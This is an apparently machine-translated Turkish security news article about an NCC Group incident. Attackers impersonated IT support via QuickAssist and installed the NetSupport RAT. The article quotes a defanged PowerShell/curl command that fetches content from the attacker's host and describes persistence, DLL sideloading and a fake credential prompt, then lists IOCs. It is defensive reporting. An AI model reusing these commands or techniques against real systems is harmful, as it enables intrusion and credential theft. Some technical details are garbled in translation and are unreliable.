Bilgisayar korsanları 300 saniyede uzaktan erişim elde etmek için sosyal mühendislik saldırısı kullanır


300 saniyede hacklendi

Tehdit aktörleri, sosyal mühendislik taktikleri ve hızlı PowerShell infazının bir kombinasyonunu kullanarak kurumsal sistemleri sadece beş dakika içinde başarılı bir şekilde tehlikeye attı.

NCC Group’un Dijital Adli Tıp ve Olay Yanıtı (DFIR) ekibi tarafından araştırılan olay, siber suçluların geleneksel güvenlik önlemlerini atlamak için güvenilir iş uygulamalarını nasıl silahlandırdığını gösteriyor.

Key Takeaways
1. Hackers impersonated IT support to gain QuickAssist remote access and compromised it in under 5 minutes.
2. Deployed NetSupport Manager RAT.
3. Legitimate tools weaponized through social engineering, requiring better user training.

Hızlı Saldırı: 300 saniyelik uzlaşma

Tehdit oyuncusu, BT destek personelini taklit ederek yaklaşık yirmi kullanıcıyı hedefleyen dikkatle düzenlenmiş bir kampanya yürüttü.

Google Haberleri

İki kurbanı uzaktan erişim sağlamaya ikna eden saldırganlar, Windows’un yerli QuickAssist.exe uzaktan destek aracını ilk dayanağı oluşturmak için kullandı.

Erişim kazandıktan sonra 300 saniye içinde, rakipler hücum araçlarını indiren ve birden fazla kalıcılık mekanizması oluşturan bir dizi PowerShell komutu kullandılar.

Saldırı dizisi, komutu kullanarak pano manipülasyonu ile başladı (curl hxxps: // resutato[.]com/2-4.txt) .Content | Set-Clipboard, ardından gizlenmiş Powershell komut dosyalarının yürütülmesi raporu okur.

Birincil yük indirimi, kötü amaçlı kodun HXXPS: // Resutato adresinde barındırılan bir JPEG dosyasına gömüldüğü sofistike bir steganografik teknikle gerçekleşti.[.]com/b2/res/nh2.jpg.

Komut dosyası, “nethealth” yazılımı olarak gizlenmiş Netsupport yöneticisi bileşenlerini içeren bir fermuar arşivini çıkarmak ve yeniden inşa etmek için 4 baytlık bir işaretleyici (0x31, 0x67, 0xbe, 0xe1) ile XOR şifrelemesini kullandı.

Kimlik bilgisi hasat

Saldırganlar, birden fazla kalıcılık mekanizması uygulayarak gelişmiş tradecraft gösterdiler.

Randomize DLL adları ile regsvr32.exe kullanarak her beş dakikada bir yürütülecek şekilde yapılandırılmış zamanlanmış görevler oluşturdular ve HKCU \ Microsoft \ Windows \ CurrentVersion \ Run \ Nethealth aracılığıyla HKCU \ Software \ Software \ Software aracılığıyla yerleşik kayıt defteri kalıcılığı oluşturdu.

Kötü amaçlı yazılım, Msiexec.exe ve Genup.exe gibi meşru ikili dosyaları, DLL yan yükleme saldırıları için kullandı ve truva atık Libcurl.dll bileşenini dağıttı.

Belki de en önemlisi, meşru sistem kimlik doğrulama istemlerini taklit eden sofistike bir kimlik bilgisi hasat GUI’sinin konuşlandırılmasıydı.

PowerShell tabanlı arabirim (c: \ users \ {username} \ VideoS \ l.ps1), $ env: temp \ cred.txt’e düz metin kimlik bilgilerini yakalayan ikna edici bir “sistem kimlik bilgisi doğrulaması” iletişim kutusuyla tam ekran bir kaplama oluşturdu.

Arayüz, kullanıcı kaçışını önlemek için görev çubuğu erişimi ve çeşitli klavye kısayolları dahil kritik Windows işlevlerini devre dışı bıraktı.

Komuta ve Kontrol İletişimi, resutato dahil olmak üzere birden çok alan ile kuruldu[.]com ve nimbusvaults[.]com, uzaktan yönetim özelliklerini etkinleştirme.

Saldırının başarısı, kısa güvenlik ihlalleri bile önemli bir organizasyonel uzlaşmaya neden olabileceğinden, gelişmiş kullanıcı farkındalığı eğitimi ve sağlam olay müdahale yeteneklerine yönelik kritik ihtiyacın altını çiziyor.

Değer Tip Yorum
resutato[.]com İhtisas Komut ve Kontrol
hxxps://resutato[.]com/b2/st/st[.]php Url Komut ve Kontrol + Kötü Yazılım İndir
hxxps://resutato[.]com/2-4.txt Url Kötü amaçlı yazılım indir
hxxp://196.251.69[.]195 Url Kötü amaçlı yazılım indir
196.251.69[.]195 IP adresi Kötü amaçlı yazılım indir
4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa SHA1 libcurl.dll
df3125365d72abf965368248295a53da1cdceabe SHA1 Update.msi

SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın



Source link